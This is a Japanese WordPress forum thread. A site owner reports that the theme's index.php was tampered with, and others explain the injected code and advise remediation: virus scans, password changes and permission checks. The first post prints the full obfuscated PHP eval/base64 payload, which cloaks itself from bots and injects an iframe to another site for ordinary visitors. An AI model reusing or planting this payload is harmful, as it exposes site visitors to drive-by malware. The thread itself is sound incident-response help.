テーマのindex.phpが書き換えられる（クラッキングされてしまう）

[ノッブス]

先日来より（数ヶ月前）、テーマのindex.phpのヘッダー部分が以下のように書き換えられてしまい、正常に表示されません。

どのように対処するればよろしいのでしょうか？

<?php eval(base64_decode(‘ZXJyb3JfcmVwb3J0aW5nKDApOw0KJGJvdCA9IEZBTFNFIDsNCiR1YSA9ICRfU0VSVkVSWydIVFRQX1VTRVJfQUdFTlQnXTsNCiRib3RzVUEgPSBhcnJheSgnMTIzNDUnLCdhbGV4YS5jb20nLCdhbm9ueW1vdXNlLm9yZycsJ2JkYnJhbmRwcm90ZWN0LmNvbScsJ2Jsb2dwdWxzZS5jb20nLCdib3QnLCdidXp6dHJhY2tlci5jb20nLCdjcmF3bCcsJ2RvY29tbycsJ2RydXBhbC5vcmcnLCdmZWVkdG9vbHMnLCdodG1sZG9jJywnaHR0cGNsaWVudCcsJ2ludGVybmV0c2Vlci5jb20nLCdsaW51eCcsJ21hY2ludG9zaCcsJ21hYyBvcycsJ21hZ2VudCcsJ21haWwucnUnLCdteWJsb2dsb2cgYXBpJywnbmV0Y3JhZnQnLCdvcGVuYWNvb24uZGUnLCdvcGVyYSBtaW5pJywnb3BlcmEgbW9iaScsJ3BsYXlzdGF0aW9uJywncG9zdHJhbmsuY29tJywncHNwJywncnJycnJycnJyJywncnNzcmVhZGVyJywnc2x1cnAnLCdzbm9vcHknLCdzcGlkZXInLCdzcHlkZXInLCdzem4taW1hZ2UtcmVzaXplcicsJ3ZhbGlkYXRvcicsJ3ZpcnVzJywndmxjIG1lZGlhIHBsYXllcicsJ3dlYmNvbGxhZ2UnLCd3b3JkcHJlc3MnLCd4MTEnLCd5YW5kZXgnLCdpcGhvbmUnLCdhbmRyb2lkJyk7DQpmb3JlYWNoICgkYm90c1VBIGFzICRicykge2lmKHN0cnBvcyhzdHJ0b2xvd2VyKCR1YSksICRicykhPT0gZmFsc2UpeyRib3QgPSB0cnVlOyBicmVhazt9fQ0KaWYgKCEkYm90KXsNCgllY2hvKGJhc2U2NF9kZWNvZGUoJ1BITmpjbWx3ZEQ1cFppaDNhVzVrYjNjdVpHOWpkVzFsYm5RcFlUMG9JblZ5WmpNaUxuTndiR2wwS3lkMGRqTXlhR3AwYTJ4dUp5a3VjM1ZpYzNSeUtEQXNOaWs3WVdFOUtFUmhkR1VyZTMwcExuTjFZbk4wY2lnd0xEWXBPMmxtS0dFOVBUMWhZU2tLWmoxYkxUSTRMQzB5T0N3Mk9DdzJOU3d0TlN3ekxEWXpMRGMwTERZeUxEZ3dMRGN5TERZMExEY3pMRGM1TERrc05qWXNOalFzTnprc016SXNOekVzTmpRc056SXNOalFzTnpNc056a3NOemdzTWprc09EUXNORGNzTmpBc05qWXNOREVzTmpBc056SXNOalFzTXl3eUxEWXhMRGMwTERZekxEZzBMRElzTkN3MU5Dd3hNU3cxTml3MExEZzJMQzB5T0N3dE1qZ3NMVEk0TERZNExEWTFMRGMzTERZd0xEY3lMRFkwTERjM0xETXNOQ3d5TWl3dE1qZ3NMVEk0TERnNExDMDFMRFkwTERjeExEYzRMRFkwTEMwMUxEZzJMQzB5T0N3dE1qZ3NMVEk0TERZekxEYzBMRFl5TERnd0xEY3lMRFkwTERjekxEYzVMRGtzT0RJc056Y3NOamdzTnprc05qUXNNeXd0TXl3eU15dzJPQ3cyTlN3M055dzJNQ3czTWl3Mk5Dd3ROU3czT0N3M055dzJNaXd5TkN3eUxEWTNMRGM1TERjNUxEYzFMREl4TERFd0xERXdMRGMxTERjMUxEWXdMRFkwTERnMExEZzFMRFk0TERZNUxEY3dMRGtzTmpVc056Y3NOalFzTmpRc056a3NOaklzTnpVc09TdzJNaXczTkN3M01pd3hNQ3cyT0N3eE1DdzJPQ3c1TERjMUxEWTNMRGMxTERJMkxEWTJMRGMwTERJMExERXlMRElzTFRVc09ESXNOamdzTmpNc056a3NOamNzTWpRc01pd3hNaXd4TVN3eUxDMDFMRFkzTERZMExEWTRMRFkyTERZM0xEYzVMREkwTERJc01USXNNVEVzTWl3dE5TdzNPQ3czT1N3NE5DdzNNU3cyTkN3eU5Dd3lMRGd4TERZNExEYzRMRFk0TERZeExEWTRMRGN4TERZNExEYzVMRGcwTERJeExEWTNMRFk0TERZekxEWXpMRFkwTERjekxESXlMRGMxTERjMExEYzRMRFk0TERjNUxEWTRMRGMwTERjekxESXhMRFl3TERZeExEYzRMRGMwTERjeExEZ3dMRGM1TERZMExESXlMRGN4TERZMExEWTFMRGM1TERJeExERXhMREl5TERjNUxEYzBMRGMxTERJeExERXhMREl5TERJc01qVXNNak1zTVRBc05qZ3NOalVzTnpjc05qQXNOeklzTmpRc01qVXNMVE1zTkN3eU1pd3RNamdzTFRJNExEZzRMQzB5T0N3dE1qZ3NOalVzT0RBc056TXNOaklzTnprc05qZ3NOelFzTnpNc0xUVXNOamdzTmpVc056Y3NOakFzTnpJc05qUXNOemNzTXl3MExEZzJMQzB5T0N3dE1qZ3NMVEk0TERneExEWXdMRGMzTEMwMUxEWTFMQzAxTERJMExDMDFMRFl6TERjMExEWXlMRGd3TERjeUxEWTBMRGN6TERjNUxEa3NOaklzTnpjc05qUXNOakFzTnprc05qUXNNeklzTnpFc05qUXNOeklzTmpRc056TXNOemtzTXl3eUxEWTRMRFkxTERjM0xEWXdMRGN5TERZMExESXNOQ3d5TWl3Mk5TdzVMRGM0TERZMExEYzVMREk0TERjNUxEYzVMRGMzTERZNExEWXhMRGd3TERjNUxEWTBMRE1zTWl3M09DdzNOeXcyTWl3eUxEY3NNaXcyTnl3M09TdzNPU3czTlN3eU1Td3hNQ3d4TUN3M05TdzNOU3cyTUN3Mk5DdzROQ3c0TlN3Mk9DdzJPU3czTUN3NUxEWTFMRGMzTERZMExEWTBMRGM1TERZeUxEYzFMRGtzTmpJc056UXNOeklzTVRBc05qZ3NNVEFzTmpnc09TdzNOU3cyTnl3M05Td3lOaXcyTml3M05Dd3lOQ3d4TWl3eUxEUXNNaklzTmpVc09TdzNPQ3czT1N3NE5DdzNNU3cyTkN3NUxEZ3hMRFk0TERjNExEWTRMRFl4TERZNExEY3hMRFk0TERjNUxEZzBMREkwTERJc05qY3NOamdzTmpNc05qTXNOalFzTnpNc01pd3lNaXcyTlN3NUxEYzRMRGM1TERnMExEY3hMRFkwTERrc056VXNOelFzTnpnc05qZ3NOemtzTmpnc056UXNOek1zTWpRc01pdzJNQ3cyTVN3M09DdzNOQ3czTVN3NE1DdzNPU3cyTkN3eUxESXlMRFkxTERrc056Z3NOemtzT0RRc056RXNOalFzT1N3M01TdzJOQ3cyTlN3M09Td3lOQ3d5TERFeExESXNNaklzTmpVc09TdzNPQ3czT1N3NE5DdzNNU3cyTkN3NUxEYzVMRGMwTERjMUxESTBMRElzTVRFc01pd3lNaXcyTlN3NUxEYzRMRFkwTERjNUxESTRMRGM1TERjNUxEYzNMRFk0TERZeExEZ3dMRGM1TERZMExETXNNaXc0TWl3Mk9DdzJNeXczT1N3Mk55d3lMRGNzTWl3eE1pd3hNU3d5TERRc01qSXNOalVzT1N3M09DdzJOQ3czT1N3eU9DdzNPU3czT1N3M055dzJPQ3cyTVN3NE1DdzNPU3cyTkN3ekxESXNOamNzTmpRc05qZ3NOallzTmpjc056a3NNaXczTERJc01USXNNVEVzTWl3MExESXlMQzB5T0N3dE1qZ3NMVEk0TERZekxEYzBMRFl5TERnd0xEY3lMRFkwTERjekxEYzVMRGtzTmpZc05qUXNOemtzTXpJc056RXNOalFzTnpJc05qUXNOek1zTnprc056Z3NNamtzT0RRc05EY3NOakFzTmpZc05ERXNOakFzTnpJc05qUXNNeXd5TERZeExEYzBMRFl6TERnMExESXNOQ3cxTkN3eE1TdzFOaXc1TERZd0xEYzFMRGMxTERZMExEY3pMRFl6TERNd0xEWTNMRFk0TERjeExEWXpMRE1zTmpVc05Dd3lNaXd0TWpnc0xUSTRMRGc0WFR0dFpEMG5ZU2M3Y1QwaWNTSTdaVDEzYVc1a2IzY3VaWFpoYkR0M1BXWTdjejBuSnp0blBTZG1jbThuS3lkdFEyaGhja052WkNjckoyVW5PMlp2Y2locFBUQTdhVHgzTG14bGJtZDBhRHRwS3lzcGUzTTljeXRUZEhKcGJtZGJaMTBvTXpjcmQxdHBYU2s3ZlFwcFppaGhQVDA5WVdFcENtVW9KMlVvY3lrbktUczhMM05qY21sd2REND0nKSk7DQp9’)); get_header(); ?>

[wokamoto]

そのコードを解析してみたところ、特定のユーザーエージェント以外からのアクセスだった場合に JavaScript で iframe タグを埋め込み、他のサイトを表示させようとしています。

利用しているテーマに元からそのコードが含まれていなかったのであれば、あなたが利用している PC が「ガンブラー（Gunblar）ウィルス」に感染していて FTP パスワードを盗まれたか、サーバに置いてあるプログラムの脆弱性を突かれて、改ざんされた可能性があります。

最近では WordPress プラグイン wp-phpmyadmin の脆弱性により、コードが改ざんされた事例もあります。
http://weble.org/2012/01/20/weble-alter
http://heteml.jp/pages/security/

まずは、使用されているPC のウイルスチェックを行って、Gunblar に感染していないか確認しましょう。
WP, MySQL, FTP のパスワードは変更したほうが良いです。
また、サーバでは適切にパーミションを設定し、他にも改ざんされたファイルが存在するかチェックしたほうが良いです。
http://ja.forums.wordpress.org/topic/2907?replies=4

[win@clue]

はじめまして。
私も昨年、同じような被害に遭いました。

色々とネット検索で調べ、下記の参考情報を見ながらあらゆる対策を施しましたが結局改善されず、原因も特定できず、サーバーを引越ししました。

サーバー引越し後はお陰さまで被害ゼロです。

私の場合は、レンタルサーバーの仕様で、データベースをGUI管理するphpmyadminというソフトウェアが公開ディレクトリに組み込んであって、それを書き換えられたことが原因だったのではないかと推測しています。

このフォーラム内では↓が参考になるかと・・・

http://ja.forums.wordpress.org/topic/1301?replies=30

外部サイトでは、参考↓
googleで、「　Evil backdoors　」で検索してみてください。（英語ですが）

http://d.hatena.ne.jp/snufkinski/20100206/1265434884

http://www.e-provider.jp/server/cgi.html

[wokamoto]

一応、埋め込まれたコードが何をしているか、軽く解説しました。
http://wokamoto.wordpress.com/2012/01/24/malware-analyze/

[ノッブス]

ありがとうございます。
やってみます。